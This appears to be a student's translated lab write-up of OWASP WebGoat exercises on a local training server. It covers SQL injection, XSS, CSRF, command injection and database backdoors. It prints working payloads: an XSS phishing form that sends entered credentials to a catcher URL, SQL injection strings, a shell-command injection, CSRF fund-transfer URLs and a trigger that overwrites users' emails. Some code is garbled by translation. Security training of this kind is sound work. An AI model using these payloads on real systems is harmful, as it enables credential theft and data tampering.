20145225 Tang Web Security Foundation practice of "cyber confrontation"

20145225 Tang "Cyber confrontation" Web Security Basics Practice Reference Blog: 20145215 Luchomin basic question Answer

(1) SQL injection attack principle, how to defend?

• A SQL injection attack is the goal of tricking a server into executing a malicious SQL command by inserting a SQL command into a Web form to submit or entering a query string for a domain name or page request.

• Defense: Use input rules to limit defenses, filter input data, and not allow special character input.

(2) What is the principle of XSS attack and how to defend it?

• A cross-site scripting attack that allows a malicious user to inject malicious script code into a Web page, where the script code embedded within the Web is executed, and other users are affected when they view the Web page. The main purpose of XSS attack is to find a way to obtain the cookie of the target attack website, because the cookie is equivalent to the seesion, and with this information can log on to the website in any PC that can connect to the Internet, and do some damage in the identity of others.

• Defense: Filter the required parameters before the form submission or URL parameters are passed, and check the contents of user input for illegal content, such as angle brackets, quotation marks, etc., and strictly control the output.

(3) CSRF attack principle, how to defend?

• CSRF attack is a cross-site forgery attack, as the name implies, is an attacker to the target site to inject a malicious URL cross-site address, when the user clicked on the URL, you can do something users do not want.

• Defense:通过referer、token或者验证码来检测用户提交；在form中包含秘密信息、用户指定的代号作为cookie之外的验证；定期清理保存的cookie。

WebGoat

• Webgoat is an application platform developed by the OWASP Organization for Web vulnerability experiments to illustrate security vulnerabilities in Web applications. Webgoat is running on a platform with a Java virtual machine, there are many training courses available, including XSS, thread safety, SQL injection, and so on, our experiment is on the Webgoat platform.

1. Webgoat is divided into simple version and Development Board, the simple version is a Java jar package, only need to have a Java environment, we execute at the command line: java -jar webgoat-container-7.0.1-war-exec.jar run Webgoat:

2.WebGoat uses 8080 ports, so access on the browser localhost:8080/WebGoat , after entering Webgoat, you can see a lot of questions to let us practice.

Phishing with XSS

1. This topic we want to enter the XSS attack code in the search box, using XSS to further add elements to existing pages. We first create a form that lets the victim fill in the user name and password in the form we created, add a piece of JavaScript code, read the username and password entered by the victim, and send the message tohttp://localhost:8080/WebGoat/catcher?PROPERTY=yes..., the full XSS attack code is as follows:

   </form><script>function Hack () {xssimage=NewImage; XSSIMAGE.SRC="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ Document.phish.user.value +"&password="+ Document.phish.pass.value +""; Alert ("had this been a real attack ... Your credentials were just stolen. User Name ="+ Document.phish.user.value +"Password ="+document.phish.pass.value); } </script><form name="Phish"><br><br><HR> "text"Name="User"> <br>enter password:<br> <input type="Password"Name ="Pass"><br> <input type="Submit"Name="Login"Value="Login"onclick="hack ()"></form><br><br><HR>

   Enter your username and password, click Login, Webgoat will capture the information you entered and feedback to you

Attack success:

Stored XSS Attacks

1. Our goal is to create illegal message content that can cause other users to load unexpected pages or content when they visit, this is easy ah, in the last experiment we have done, directly in the title to lose something, and then enter a string of code in the message, such as:<script>alert("5225 attack succeed!");</script>

Reflected XSS Attacks

1. When we enter the wrong user information, the server check input is wrong, return the error page and show us the error content:

Enter <script>alert ("5239 attack succeed!") in the Code box; </script> takes an offensive URL as the input source.

Pop-up session box, reflective XSS attack success!

Cross Site Request forgery

Write a URL to entice other users to click, triggering the CSRF attack, we can put the URL in the form of a picture in the message box, when the URL is not visible to other users, the user once click on the image, will trigger a CSRF event.

In the message box, enter

(The values of screen and menu are viewed on the right side of the window)

After the submission in the following message list can be seen I just sent the messages, click on it, the current page will download this message and display it, to transfer the user's 5225 yuan, so as to achieve the purpose of CSRF attack

Screen and menu values each person's computer may be different and can be viewed on the right side of the current page with a parameters:

After submission, you will see a new message in the message list, click on the message, the current page will download the message and display it, the user's 4000 yuan, so as to achieve the purpose of CSRF attack.

CSRF Prompt By-Pass

Browser to open a new page, enter Localhost:8080/webgoat/attack? screen=1410&menu=900&transferfunds=5000 Enter the confirmation transfer request page.

After clicking Confirm, then enter Localhost:8080/webgoat/attack? Screen=1410&menu=900&transferfunds=confirm

5000 Yuan was successfully transferred. The reason is that the transferfunds value in the source code of the Web page becomes confirm.

Command Injection

An extension firebug under the browser to modify the source code, right click Backdoors.help next to add "& Netstat-an & ipconfig"

Select the modified value and then click View, you can see the command is executed, the system network connection situation:

Numeric SQL Injection

After 103, add an or 1=1 to make it a perpetual truth.

Click go! The discovery has been successful.

String SQL Injection

Enter ' or 1=1--constructs the eternal truth type. Click go! All user information has been found to be displayed.

Lab:sql Injection (Stage 1:string SQL injection)

Enter ' or 1=1--inject, fail. Right-click on the input box to open the HTML source code, found that MaxLength is limited to 8. Modified to 20, landing again, success!

Lab:sql Injection (Stage 3:numeric SQL injection)

On the basis of the previous experiment, a general employee's account, Larry, browses his boss's account information.

Right-click on Larry's name to open the source code and find out that this place is passing parameters as an index of the employee ID. Modify value to 101 or 1=1 order BY salary desc--

The boss's message will be the first one.

Click Viewprofile again to see that you have seen the boss's message.

Database backdoors

Enter 101 first to get the user's information:

Injection Statement 101; Update employee set salary=5239, which turns its salary to 5239.

Last input 101; CREATE TRIGGER Lxmbackdoor before INSERT on employee for each ROW BEGIN UPDATE employee SET email= ' [email protected] ' wher E UserID = New.userid All mailboxes and user IDs in the table are set to my own.

20145225 Tang Web Security Foundation practice of "cyber confrontation"